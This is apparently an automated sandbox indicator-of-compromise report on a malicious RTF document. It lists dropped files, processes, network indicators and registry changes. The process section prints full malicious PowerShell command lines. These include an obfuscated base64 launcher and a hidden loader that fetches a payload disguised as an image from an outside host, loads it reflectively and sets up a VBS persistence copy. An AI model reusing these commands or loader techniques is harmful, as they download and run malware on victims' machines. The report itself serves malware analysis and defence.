IOC Report
nU7Z8sPyvf.rtf

loading gif

Files

File Path
Type
Category
Malicious
nU7Z8sPyvf.rtf
Rich Text Format data, version 1
initial sample
 malicious
C:\ProgramData\antre.vbs
ASCII text, with very long lines (332), with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\indexphppagenotfound[1].gif
Unknown
dropped
 malicious
C:\Users\user\AppData\Local\Temp\note\nots.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs
Unknown
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\e1cCs[1].txt
Unicode text, UTF-8 text, with very long lines (11453), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{311FE58D-0A0A-4906-BBEA-A4F14D5BBA3F}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{41861850-5C7E-478B-A22E-FDD1B51B9935}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2F14953-7834-4109-8F97-B0AFE5CAF451}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\bv4ftu3g.tqs.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\iadnmix3.urp.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\iuqdab5m.hza.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\karhafqd.k2v.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [folders]
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nU7Z8sPyvf.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Wed May 1 11:54:57 2024, length=78038, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\Desktop\~$7Z8sPyvf.rtf
data
dropped
\Device\Mup\YPSIACH*\MAILSLOT\NET\NETLOGON
data
dropped
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
 malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
 malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreTQBSDgTreEgDgTreSDgTreDgTrevDgTreDgDgTreODgTreDgTrewDgTreDgDgTreMgDgTrevDgTreDYDgTreLgDgTrexDgTreDMDgTreLgDgTreyDgTreDcDgTreMQDgTreuDgTreDcDgTreMDgTreDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBhDgTreG4DgTredDgTreByDgTreGUDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\antre.vbs"
malicious

URLs

Name
IP
Malicious
https://uploaddeimagens.com.br/images/004/
unknown
 malicious
http://geoplugin.net/json.gp
178.237.33.50
 malicious
sembe.duckdns.org
malicious
https://uploaddeimagens.com.br/images/00
unknown
 malicious
http://geoplugin.net/json.gp/C
unknown
 malicious
https://uploaddeimagens.com.br
unknown
 malicious
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
172.67.215.45
 malicious
http://107.172.31.6/28088/HHRM.txt
107.172.31.6
 malicious
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
http://ocsp.entrust.net03
unknown
https://paste.ee/d/e1cCsG
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://paste.ee/d/e1cCs
104.21.84.67
http://app01.system.com.br/RDWeb/Pages/login.aspxd
unknown
https://www.google.com
unknown
https://paste.ee/d/e1cCs5
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://geoplugin.net/json.gp(GZ&
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
http://go.microsoft.c
unknown
https://cdnjs.cloudflare.com
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx70
unknown
https://cdnjs.cloudflare.com;
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspxL
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx
unknown
http://crl.entrust.net/2048ca.crl0
unknown
There are 30 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
sembe.duckdns.org
194.187.251.115
 malicious
uploaddeimagens.com.br
172.67.215.45
 malicious
paste.ee
104.21.84.67
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
107.172.31.6
unknown
United States
malicious
172.67.215.45
uploaddeimagens.com.br
United States
malicious
194.187.251.115
sembe.duckdns.org
United Kingdom
malicious
178.237.33.50
geoplugin.net
Netherlands
104.21.84.67
paste.ee
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-999Z97
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
~&.
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6(.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
d*.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\28A45
28A45
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
